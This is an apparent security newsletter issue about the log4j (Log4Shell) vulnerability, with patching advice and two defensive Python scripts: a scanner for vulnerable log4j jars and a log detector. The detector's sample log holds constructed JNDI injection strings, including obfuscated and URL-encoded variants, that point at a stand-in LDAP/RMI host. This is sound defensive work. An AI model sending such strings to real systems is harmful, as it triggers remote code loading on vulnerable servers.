🦊 log4j and what to do
Dec 14, 2021 6:30 pm
...people are saying this is bad and it is. Kind of like Covid (may be here to stay for a while). Below are some initial instructions to take action.
Hi. I'm Jon Fedor and this is InCyber Regular, edition 25. It's crazy to me to be at edition 25. Didn't think we would make it this far. It's been a good journey so far, let's keep it up!
InCyber exists to help people secure their digital gemstones and belongings. It's about cybersecurity for the rest of us.
And we have suggestions to make your digital presence more secure than it was yesterday.
How do we measure this?
Goal One: inspire at least three people to use a password manager before the end of 2021.
Status on Goal One:
We've got two confirmed and one more tentative (needs confirmation) for starting to use a password manager! This is stretch goal progress! We're stretching like Mr. Fantastic.
Give someone the gift of security this year (or yourself) and get yourself a shiny new password manager.
Now on to the good stuff.
Today:
- log4j and what to do
- Doing security quietly
- Jason Momoa
log4j
They really do name these huge cybersecurity incidents strangely. Actually, it's really programmers who name things strangely. Here's another strange one: CVE-2021-44228.
CVE-2021-44228 is the official Common Vulnerabilities and Exposures (CVE) identifier for the log4j vulnerability, which has also picked up the nickname "Log4Shell." Here's a profile of CVE-2021-44228 from NIST if you want to dive deeper.
ZDNet published a great article on log4j (updated today, 14-Dec) if you want a good sketch of the entire situation but here's some additional info.
Log4j (specifically Apache Log4j 2) is a legit open-source logging library that Java developers, web developers included, use for event logging in their applications. It's used for good: to record events as they happen in a program or server so that, if something goes wrong, teams can go back and examine the evidence.
However, bad actors have figured out how to get remote code execution (RCE) on systems by abusing a vulnerability in log4j. The short version: vulnerable versions of Log4j 2 treat certain ${...} strings inside a log message as lookups to be evaluated, and the JNDI lookup will happily go fetch and load code from a server the attacker names. So if an attacker can get a string like that into anything your application logs (a username, a browser User-Agent header, a search box), they can make your server run their code.
And yes, there are patches for this vulnerability: Apache has published fixed releases of log4j.
However, log4j is used in allllll kinds of software and SaaS tools. So many vulnerable copies remain, because every product and service that bundles it has to be found and patched separately, often by the vendor or service provider rather than by you.
This gets at why the problem is so bad:
From the ZDNet article, "As Sans Internet Storm Center notes: "There is no generic 'log4j2' patch to patch everything. In some cases, vendors including Log4j, need to patch their software to include the new version."
Log4j is like living in the desert and trying to keep sand out of your butt crack. It's just everywhere.
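Here's an added example of what "find every copy" actually looks like in practice. This is my own script, not something from ZDNet, SANS, or Apache: it walks a directory, opens every jar/war/ear it finds (and the jars nested inside them, which is where fat jars and web apps hide their copies), and reports the log4j-core version plus whether the JndiLookup class is still inside. It builds its own fake jars in a temp folder as constructed sample data, so nothing here touches real Apache files. One simplification to know about: it treats anything below 2.15.0 (the first release that fixed CVE-2021-44228) as needing action and ignores the backported fix releases for older Java, so use it for triage, not as the final word.

```python
import io
import os
import re
import tempfile
import zipfile

# Members that identify a log4j-core jar and its version (real paths inside the jar).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")
# Simplification: 2.15.0 was the first release fixing CVE-2021-44228; backported
# fix lines for older Java versions are not modelled, so this is a triage aid.
FIXED_VERSION = (2, 15, 0)


def parse_version(pom_properties):
    """Pull the version= line out of Maven pom.properties text, or None."""
    m = re.search(r"^version=(\S+)", pom_properties, re.MULTILINE)
    return m.group(1) if m else None


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); missing parts pad with 0 so tuples compare cleanly."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def inspect_archive(source, label):
    """Inspect one zip-format archive (path or BytesIO) plus any archives nested in it."""
    findings = []
    try:
        zf = zipfile.ZipFile(source)
    except zipfile.BadZipFile:
        return findings  # not a zip or corrupt: nothing to report
    with zf:
        names = set(zf.namelist())
        has_jndi = JNDI_LOOKUP_CLASS in names
        version = None
        if POM_PROPERTIES in names:
            version = parse_version(zf.read(POM_PROPERTIES).decode("utf-8", "replace"))
        if has_jndi or version is not None:
            # JndiLookup present with an unknown version: investigate, don't assume patched.
            needs_action = has_jndi and (version is None or version_tuple(version) < FIXED_VERSION)
            findings.append({"location": label, "version": version,
                             "jndi_lookup_present": has_jndi, "needs_action": needs_action})
        # Fat jars (BOOT-INF/lib) and wars (WEB-INF/lib) bundle their own log4j-core: recurse.
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_EXTS):
                findings.extend(inspect_archive(io.BytesIO(zf.read(name)), f"{label}!{name}"))
    return findings


def scan_tree(root):
    """Walk a directory tree and inspect every archive under it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXTS):
                full = os.path.join(dirpath, fname)
                findings.extend(inspect_archive(full, os.path.relpath(full, root).replace(os.sep, "/")))
    return sorted(findings, key=lambda f: f["location"])


def make_jar(version, include_jndi, extra=None):
    """Build a fake jar in memory. Constructed test data, not a real Apache artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if version is not None:
            zf.writestr(POM_PROPERTIES, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not real bytecode
        for name, data in (extra or {}).items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree(root):
    """Lay out a constructed app directory: a vulnerable copy, a fixed copy, an unrelated
    jar, and a fat jar hiding another vulnerable copy one level down."""
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib, exist_ok=True)
    samples = {
        os.path.join(lib, "log4j-core-2.14.1.jar"): make_jar("2.14.1", True),
        os.path.join(lib, "log4j-core-2.16.0.jar"): make_jar("2.16.0", False),
        os.path.join(lib, "commons-io.jar"): make_jar(None, False, {"org/example/Util.class": b"\x00"}),
        os.path.join(root, "app", "myservice.jar"): make_jar(
            None, False, {"BOOT-INF/lib/log4j-core-2.14.1.jar": make_jar("2.14.1", True)}),
    }
    for path, data in samples.items():
        with open(path, "wb") as fh:
            fh.write(data)


def demo_findings():
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in demo_findings():
        flag = "NEEDS ACTION" if f["needs_action"] else "ok"
        print(f"{flag:12} {f['location']} version={f['version']} JndiLookup={f['jndi_lookup_present']}")
```

Run it as-is and it prints one line per copy it found in the fake tree; point scan_tree at a real install directory to use it for real. Notice that the copy inside myservice.jar only shows up because the script opens nested archives, which is exactly the kind of copy a quick "find / -name 'log4j*'" misses.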
Microsoft's seen all kinds of exploitations of this vulnerability:
Also from the ZDNet article: "So far, Microsoft has seen attackers compromise machines to install coin miners, the Cobalt Strike pen-testing framework to enable credential theft and lateral movement, and exfiltration of data from compromised systems."
How original...bad actors gaining access and installing cryptocurrency mining infrastructure.
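One thing a team can do right now, added here as an example of my own (not Microsoft's or ZDNet's detection logic): grep the web logs for the lookup string, since the exploit only works if your server logs the attacker's text. The catch is that attackers got creative fast with tricks like ${${lower:j}ndi:...} and ${${::-j}${::-n}...} to dodge a plain search for "jndi", and they URL-encode it when it goes in the request path. So this script first peels those layers off the same way log4j's own lookups would, then checks for ${jndi:...}. The log lines, addresses, and payloads are all constructed for the example.

```python
import re
from urllib.parse import unquote

# An innermost ${...} lookup (no further ${ inside it).
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are really after once the obfuscation is peeled off: ${jndi:<protocol>:...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)
MAX_PASSES = 20  # hard bound on the de-obfuscation loop

# Constructed access-log lines in common log format. Addresses are documentation
# ranges (RFC 5737) and the payloads are made up; nothing here is from a real incident.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Dec/2021:18:30:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Dec/2021:18:30:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [14/Dec/2021:18:30:03 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
203.0.113.12 - - [14/Dec/2021:18:30:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7:1389/c}"
203.0.113.12 - - [14/Dec/2021:18:30:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/d}"
203.0.113.20 - - [14/Dec/2021:18:30:06 +0000] "GET /docs/${version} HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""


def _resolve(match):
    """Evaluate one innermost lookup the way the common obfuscation tricks rely on."""
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${anything:-X} falls back to X, e.g. ${::-j} -> j
    name, sep, arg = body.partition(":")
    if sep and name.strip().lower() == "lower":
        return arg.lower()  # ${lower:J} -> j
    if sep and name.strip().lower() == "upper":
        return arg.upper()
    return match.group(0)  # leave every other lookup (jndi itself included) in place


def normalize(text):
    """URL-decode, then collapse nested lookups from the inside out until stable."""
    text = unquote(text)
    for _ in range(MAX_PASSES):
        new_text = INNER_LOOKUP.sub(_resolve, text)
        if new_text == text:
            break
        text = new_text
    return text


def scan_log(log_text):
    """Return one finding per line that carries a JNDI lookup once normalized."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        normalized = normalize(line)
        m = JNDI_LOOKUP.search(normalized)
        if not m:
            continue
        end = normalized.find("}", m.end())
        payload = normalized[m.start():end + 1] if end != -1 else normalized[m.start():]
        findings.append({
            "line_no": line_no,
            "client": line.split(" ", 1)[0],  # first field of a common-log-format line
            "protocol": m.group(1).lower(),   # ldap, ldaps, rmi, dns, ... says what was attempted
            "payload": payload,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line_no']}: {f['client']} sent a {f['protocol']} lookup: {f['payload']}")
```

Two things worth noticing. The benign ${version} on the last line is left alone, so this isn't just "alert on any dollar-brace." And the protocol field matters: an ldap or rmi lookup that reached a server you don't control means the attacker's class could have been fetched, while a dns lookup is usually a scanner just checking whether you're vulnerable. Either way, that client address and timestamp are where the incident review starts.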
So, What Can We Do?
Naomi Buckwalter, a vCISO I follow, wrote a great post yesterday about this. You can read it all here.
But there are two critical things:
- Patch all the software and services you use. If you're getting messages saying updates are available...make the updates now. This includes hardware like NAS devices, IoT devices, and...
- Routers - grab the latest firmware updates for your home routers and install them. It's go time.
This family of vulnerabilities is here to stay for a while; it may be the new normal just like Covid in our personal lives. We'll have to be vigilant on this threat vector for a while.
Quiet Security
I follow a guy named Philip Winstanley. He's a CISO and security advisor.
Last week he published a thoughtful piece of writing I wanted to share.
This is how he opens, "Our profession, security, is loud and aggressive. It’s geared around combative actions. There’s an expectation that we as security professionals should be loud and aggressive too."
He goes on to make the case for doing security in a quiet, consistent, unflappable manner using some principles like:
- Being quick to listen and slow to speak
- Being proactive and thoughtfully optimizing work
- Being a peacemaker not a troublemaker (can be easier said than done in security)
- Being a bar-raiser without being a jerk (love this)
It's a good read and I recommend it.
Jason's the gift that keeps giving
The picture in the meme itself is just constantly applicable. In this case, it's log4j.
Thanks!
Hanging with you is a highlight of my week!
I'm more active than ever on Twitter and ramping back up on LinkedIn too. Would love to connect with you in those places.
If you ever have questions on personal digital security, cyber security news, a story you want to tell, or a favorite resource to share (etc) reply back and let me know!
Have a good'un, Good Lookin'.
~ Jon "Not Jason Momoa" Fedor